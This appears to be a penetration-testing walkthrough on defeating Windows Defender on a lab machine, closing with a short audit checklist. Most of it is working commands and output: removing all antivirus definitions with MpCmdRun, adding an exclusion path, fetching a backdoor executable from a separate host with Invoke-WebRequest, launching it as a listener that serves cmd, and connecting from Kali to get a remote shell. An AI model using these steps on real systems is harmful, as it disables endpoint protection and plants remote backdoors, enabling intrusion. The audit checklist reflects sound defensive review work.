When we try to download a backdoor program Windows Defender will block the file.
Invoke-WebRequest -uri "http://192.168.1.17/sbd.exe" -OutFile ".\sbd.exe" |
View Windows Defender Threats by using the Defender Powershell Module:
Get-MpThreat CategoryID : 8 DidThreatExecute : True IsActive : False Resources : {file:_C:\Users\Mambo Yoyo\clone.exe, file:_C:\Users\Mambo Yoyo\sbd.exe, process:_pid:6560,ProcessStart:130877310747205268, process:_pid:6752,ProcessStart:130876708785643534} RollupStatus : 97 SchemaVersion : 1.0.0.0 SeverityID : 4 ThreatID : 2147626070 ThreatName : Trojan:Win32/Trafog!rts TypeID : 0 PSComputerName : |
Most antivirus software runs as a protected service so we can’t stop or disable it:
net stop windefend
System error 5 has occurred.
Access is denied. |
sc stop windefend [SC] OpenService FAILED 5: Access is denied. |
Even if we try this as ‘system’ we get an access denied:
.\psexec.exe -s cmd PsExec v2.11 - Execute processes remotely Copyright (C) 2001-2014 Mark Russinovich Sysinternals - www.sysinternals.com Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami nt authority\system C:\Windows\system32>net stop windefend System error 5 has occurred. Access is denied. |
In the GUI these functions are also not available.
One way to get our backdoor on the system is by removing all virus definitions by using the mpcmdrun command line utility.
PS C:\Program Files\Windows Defender> .\MpCmdRun.exe -removedefinitions -all Service Version: 4.8.207.0 Engine Version: 1.1.12101.0 AntiSpyware Signature Version: 1.207.1041.0 AntiVirus Signature Version: 1.207.1041.0 NIS Engine Version: 2.1.11804.0 NIS Signature Version: 115.22.0.0 Starting engine and signature rollback to none... Done! |
Now that we removed all definitions we can download our backdoor program.
Invoke-WebRequest -uri "http://192.168.1.17/sbd.exe" -OutFile ".\sbd.exe" PS C:\Users\Mambo Yoyo> dir .\sbd.exe Directory: C:\Users\Mambo Yoyo Mode LastWriteTime Length Name ---- ------------- ------ ---- -a--- 9/26/2015 10:44 AM 50176 sbd.exe |
And we can also execute our backdoor!
.\sbd.exe -l -p 444 -r 5 -e cmd -c on |
And connect to it…
root@kali:/var/www# sbd 192.168.1.8 444 -c on Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\Users\Mambo Yoyo>ipconfig ipconfig Windows IP Configuration Ethernet adapter Bluetooth Network Connection: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : Ethernet adapter Ethernet0: Connection-specific DNS Suffix . : Link-local IPv6 Address . . . . . : fe80::d876:531d:e07c:f20%3 IPv4 Address. . . . . . . . . . . : 192.168.1.8 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.1.1 |
When we update our Windows Defender Signatures, our backdoor will be detected and removed.
C:\Program Files\Windows Defender> .\MpCmdRun.exe -signatureupdate Signature update started . . . Signature update finished. |
Instead of removing the definitions we can also add an exclusionpath:
C:\users\Mambo Yoyo> Set-MpPreference -ExclusionPath "C:\Users\Mambo Yoyo" |
From a defence/audit perspective we have to verify that:
- Anti virus/malware software is installed
- Anti virus/malware software is running
- Anti virus/malware software is up-to-date
- Anti virus/malware exclusions/exceptions are reviewed
- Anti virus/malware events are send to a central log point
- Anti virus/malware events are monitored, analysed and actions must be taken